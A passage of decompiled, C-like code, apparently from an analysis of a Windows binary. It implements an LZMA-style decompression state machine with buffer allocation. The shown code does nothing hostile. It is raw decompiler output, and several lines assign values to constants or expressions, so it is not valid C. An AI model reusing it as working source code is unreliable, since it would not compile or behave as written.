												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
